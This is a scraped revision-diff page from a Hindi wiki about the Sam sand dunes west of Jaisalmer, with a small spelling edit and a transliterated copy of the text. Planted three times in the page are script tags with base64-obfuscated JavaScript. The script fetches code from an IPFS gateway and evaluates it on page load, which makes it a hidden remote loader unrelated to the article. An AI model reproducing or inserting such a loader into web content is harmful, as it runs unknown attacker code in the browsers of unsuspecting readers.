Difference between revisions of "सम के टीले जैसलमेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 6: Line 6:
 
}}
 
}}
 
*[[जैसलमेर]] [[राजस्थान]] का सबसे ख़ूबसूरत शहर है और [[जैसलमेर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
 
*[[जैसलमेर]] [[राजस्थान]] का सबसे ख़ूबसूरत शहर है और [[जैसलमेर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
*जैसलमेर के पश्चिम में 42 किलोमीटर दूर [[थार मरूस्थल]] के विशाल रेतीले टीलों का क्षेत्र प्रारम्भ होता हैं।  
+
*जैसलमेर के पश्चिम में 42 किलोमीटर दूर [[थार मरुस्थल]] के विशाल रेतीले टीलों का क्षेत्र प्रारम्भ होता हैं।  
 
*'सम' में जैसलमेर से 45 किलोमीटर दूर सम की तरह ही 'सुहड़ी' गाँव के निकट स्थित विशाल रेत के टीले भी पर्यटकों के आकर्षण का केन्द्र हैं।  
 
*'सम' में जैसलमेर से 45 किलोमीटर दूर सम की तरह ही 'सुहड़ी' गाँव के निकट स्थित विशाल रेत के टीले भी पर्यटकों के आकर्षण का केन्द्र हैं।  
 
*यहाँ का सूर्यास्त दर्शन तथा 'ऊँट सफारी' पर्यटकों का मन मोह लेते हैं।
 
*यहाँ का सूर्यास्त दर्शन तथा 'ऊँट सफारी' पर्यटकों का मन मोह लेते हैं।

Revision as of 13:17, 8 June 2011

jaisalamer jaisalamer paryatan jaisalamer zila

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • jaisalamer rajasthan ka sabase khoobasoorat shahar hai aur jaisalamer paryatan ka sabase akarshak sthal mana jata hai.
  • jaisalamer ke pashchim mean 42 kilomitar door thar marusthal ke vishal retile tiloan ka kshetr prarambh hota haian.
  • 'sam' mean jaisalamer se 45 kilomitar door sam ki tarah hi 'suh di' gaanv ke nikat sthit vishal ret ke tile bhi paryatakoan ke akarshan ka kendr haian.
  • yahaan ka sooryast darshan tatha 'ooant saphari' paryatakoan ka man moh lete haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>